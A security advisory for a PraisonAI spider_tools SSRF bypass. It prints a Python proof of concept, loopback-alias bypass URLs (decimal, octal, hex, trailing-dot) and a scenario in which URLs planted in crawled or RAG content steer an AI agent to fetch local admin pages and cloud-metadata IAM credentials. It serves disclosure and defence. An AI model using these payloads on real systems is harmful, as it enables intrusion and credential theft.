CVE-2026-47390: PraisonAI: SSRF bypass via loopback alias encodings

GHSA-5c6w-wwfq-7qqm MEDIUM
Published May 29, 2026
CISO Take

PraisonAI's spider_tools implements SSRF protection using an exact-string blocklist that fails to normalize alternate loopback representations — decimal integers, octal notation, hex, and trailing-dot variants all bypass the check and reach localhost-bound services. In agentic deployments where user-controlled or LLM-generated URLs are passed to scrape_page() or crawl(), an attacker can exfiltrate responses from local admin panels, cloud metadata endpoints (169.254.169.254), or any service bound exclusively to loopback. With 69 prior CVEs in this package and SSRF being a well-understood cloud pivot technique, the exploitation bar is low once an attacker has influence over agent inputs — a realistic condition in RAG pipelines or multi-agent workflows. Upgrade to praisonai 4.6.40 or praisonaiagents 1.6.40 immediately; if patching is delayed, add egress firewall rules blocking loopback and RFC-1918 ranges at the network layer.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Medium severity by CVSS (5.5), but contextually elevated for cloud-deployed AI agents. The vulnerability bypasses an explicit security control rather than exploiting a default-open behavior, creating false confidence in developers who believe SSRF protection is active. EPSS data unavailable; no active exploitation observed and not in CISA KEV. Blast radius is modest with 1 reported downstream dependent, but any PraisonAI deployment processing externally-influenced URLs is directly in scope. The local-attack-vector CVSS classification likely reflects standalone desktop use; in containerized or cloud agent deployments, effective exploitability is higher since the attack can be initiated remotely through agent task inputs.

Attack Kill Chain

Initial Influence
Attacker supplies or injects a loopback URL using an alternate encoding (e.g., http://2130706433:8080/ or http://0x7f000001:8080/) into agent input, a crawled webpage, or RAG-indexed content.
AML.T0051.001
Validation Bypass
spider_tools._validate_url() compares the raw hostname string against an exact blocklist and approves the alternate loopback form without DNS resolution or IP normalization.
AML.T0049
SSRF Request
requests.Session.get() issues an HTTP request to the loopback address, reaching a local-only service such as an admin panel, development server, or cloud instance metadata API.
AML.T0053
Data Exfiltration
The local service response — potentially containing credentials, internal tokens, or configuration data — is returned as agent tool output and may appear in logs, agent context, or user-facing responses.
AML.T0086

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI pip <= 4.6.39 4.6.40
1 dependents 86% patched ~0d to patch Full package profile →
praisonaiagents pip <= 1.6.39 1.6.40
11 dependents 82% patched ~0d to patch Full package profile →

Severity & Risk

CVSS 3.1
5.5 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV AC PR UI S C I A
AV Local
AC Low
PR None
UI Required
S Unchanged
C High
I None
A None

What should I do?

4 steps
  1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40.

  2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments.

  3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation — never compare raw hostname strings against a blocklist.

  4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk Management System
ISO 42001
A.9.3 - Operational planning and control
NIST AI RMF
MS-2.6 - Risk or impact assessment for known AI vulnerabilities
OWASP LLM Top 10
LLM07:2025 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-47390?

PraisonAI's spider_tools implements SSRF protection using an exact-string blocklist that fails to normalize alternate loopback representations — decimal integers, octal notation, hex, and trailing-dot variants all bypass the check and reach localhost-bound services. In agentic deployments where user-controlled or LLM-generated URLs are passed to scrape_page() or crawl(), an attacker can exfiltrate responses from local admin panels, cloud metadata endpoints (169.254.169.254), or any service bound exclusively to loopback. With 69 prior CVEs in this package and SSRF being a well-understood cloud pivot technique, the exploitation bar is low once an attacker has influence over agent inputs — a realistic condition in RAG pipelines or multi-agent workflows. Upgrade to praisonai 4.6.40 or praisonaiagents 1.6.40 immediately; if patching is delayed, add egress firewall rules blocking loopback and RFC-1918 ranges at the network layer.

Is CVE-2026-47390 actively exploited?

No confirmed active exploitation of CVE-2026-47390 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-47390?

1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40. 2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments. 3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation — never compare raw hostname strings against a blocklist. 4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.

What systems are affected by CVE-2026-47390?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, RAG pipelines, web scraping agents, multi-agent pipelines.

What is the CVSS score for CVE-2026-47390?

CVE-2026-47390 has a CVSS v3.1 base score of 5.5 (MEDIUM).

AI Security Impact

Affected AI Architectures

agent frameworksRAG pipelinesweb scraping agentsmulti-agent pipelines

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0086 Exfiltration via AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: A.9.3
NIST AI RMF: MS-2.6
OWASP LLM Top 10: LLM07:2025

Technical Details

Original Advisory

### Summary PraisonAI's `spider_tools` URL validation can be bypassed using alternate loopback host encodings. The affected component is: ```text praisonaiagents/tools/spider_tools.py ```` The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as `localhost` and `127.0.0.1`. It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request. As a result, URLs such as the following bypass the protection and still reach loopback services: ```text http://localhost.:8765/ http://127.1:8765/ http://0177.0.0.1:8765/ http://0x7f000001:8765/ http://2130706433:8765/ ``` After the weak validation passes, `scrape_page()` calls `requests.Session.get()` on the attacker-controlled URL. This allows an attacker who can influence URLs passed to `scrape_page`, `crawl`, or `extract_text` to induce SSRF requests against loopback-only services. This is a server-side request forgery protection bypass. ### Details The affected code is in: ```text praisonaiagents/tools/spider_tools.py ``` The vulnerable flow is: ```text attacker-controlled URL -> spider_tools._validate_url(...) -> weak exact-host blocklist check -> validation passes for alternate loopback encodings -> scrape_page(...) -> requests.Session.get(attacker_url) -> loopback service is reached ``` The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as: ```text localhost 127.0.0.1 ``` However, equivalent loopback forms are not rejected before the request is made. Confirmed bypass examples: ```text http://localhost.:8765/ http://127.1:8765/ http://0177.0.0.1:8765/ http://0x7f000001:8765/ http://2130706433:8765/ ``` These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation. The issue is not that `spider_tools` can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses. ### PoC The following PoC is non-destructive. It starts a local HTTP server on `127.0.0.1:8765`, then sends several alternate loopback URL forms through the real `spider_tools` validation/fetch path. The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made. The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server. #### Full PoC ```python #!/usr/bin/env python3 """PoC for PraisonAI spider_tools localhost-alias SSRF bypass.""" from __future__ import annotations import sys import threading from http.server import BaseHTTPRequestHandler, HTTPServer from pathlib import Path REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai" AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents" SPIDER_TOOLS = AGENTS_ROOT / "praisonaiagents/tools/spider_tools.py" def verify_source() -> None: expected = [ "def _validate_url", "requests.Session", ".get(", ] text = SPIDER_TOOLS.read_text(encoding="utf-8") for needle in expected: if needle not in text: raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER_TOOLS}") class LocalHandler(BaseHTTPRequestHandler): hits: list[tuple[str, str | None]] = [] body = b"LOCAL-SPIDER-SSRF-SECRET" def do_GET(self) -> None: # noqa: N802 self.__class__.hits.append((self.path, self.headers.get("Host"))) self.send_response(200) self.send_header("Content-Type", "text/plain") self.send_header("Content-Length", str(len(self.body))) self.end_headers() self.wfile.write(self.body) def log_message(self, format: str, *args) -> None: # noqa: A003 return def main() -> int: if not SPIDER_TOOLS.exists(): raise SystemExit("missing local PraisonAI source tree") verify_source() sys.path.insert(0, str(AGENTS_ROOT)) # Import the real shipped implementation. # # Depending on the exact public API exposed by spider_tools.py, # use the exported scrape function available in the local version. # The important path is: # # _validate_url(url) # -> requests.Session.get(url) # import praisonaiagents.tools.spider_tools as spider_tools server = HTTPServer(("127.0.0.1", 8765), LocalHandler) thread = threading.Thread(target=server.serve_forever, daemon=True) thread.start() candidates = [ "http://localhost.:8765/", "http://127.1:8765/", "http://0177.0.0.1:8765/", "http://0x7f000001:8765/", "http://2130706433:8765/", ] try: for url in candidates: LocalHandler.hits.clear() try: # Prefer the real public scraping API when available. if hasattr(spider_tools, "scrape_page"): result = spider_tools.scrape_page(url) elif hasattr(spider_tools, "extract_text"): result = spider_tools.extract_text(url) elif hasattr(spider_tools, "crawl"): result = spider_tools.crawl(url) else: raise RuntimeError("No expected spider_tools public fetch function found") reached = bool(LocalHandler.hits) contains_secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result) print(f"{url} passed=True reached_loopback={reached} contains_secret={contains_secret}") if not reached: raise SystemExit(f"[poc] MISS: {url} did not reach loopback server") except Exception as exc: print(f"{url} blocked_or_failed={type(exc).__name__}: {exc}") raise finally: server.shutdown() server.server_close() thread.join(timeout=1) print("[poc] HIT: alternate loopback URL forms bypassed spider_tools SSRF protection") return 0 if __name__ == "__main__": raise SystemExit(main()) ``` #### Confirmed local result The following bypasses were confirmed locally: ```text localhost. True ok ok local hit 127.1 True ok ok local hit 0177.0.0.1 True ok ok local hit 0x7f000001 True ok ok local hit 2130706433 True ok ok local hit ``` This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service. #### Expected secure behavior All loopback-equivalent addresses should be blocked before the HTTP request is made. Examples that should be rejected: ```text http://localhost/ http://localhost./ http://127.0.0.1/ http://127.1/ http://0177.0.0.1/ http://0x7f000001/ http://2130706433/ http://[::1]/ ``` #### Actual vulnerable behavior Several alternate loopback representations pass validation and are fetched by the tool. ### Impact An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services. Potential impact includes: * SSRF against localhost-only admin panels or development servers; * access to local HTTP services that are not intended to be reachable remotely; * retrieval of local service responses into the agent/tool output; * possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment. The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings. This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.

Exploitation Scenario

An adversary embeds a crafted URL in content indexed by a PraisonAI agent's RAG pipeline or a web page being crawled — for example, a page containing a link using http://2130706433:8080/admin. When the agent processes this content and invokes scrape_page() to follow the URL, the weak string-based validation approves the decimal-encoded loopback address, and requests.Session issues a GET to the local admin service. The server response — containing configuration data, session tokens, or internal API credentials — is returned as tool output to the agent, where it may be logged, embedded in agent context, or surfaced to the requesting user. In a cloud environment, substituting the metadata service path (http://2130706433/latest/meta-data/iam/security-credentials/) yields IAM credentials for the underlying host instance.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Timeline

Published
May 29, 2026
Last Modified
May 29, 2026
First Seen
May 30, 2026

Related Vulnerabilities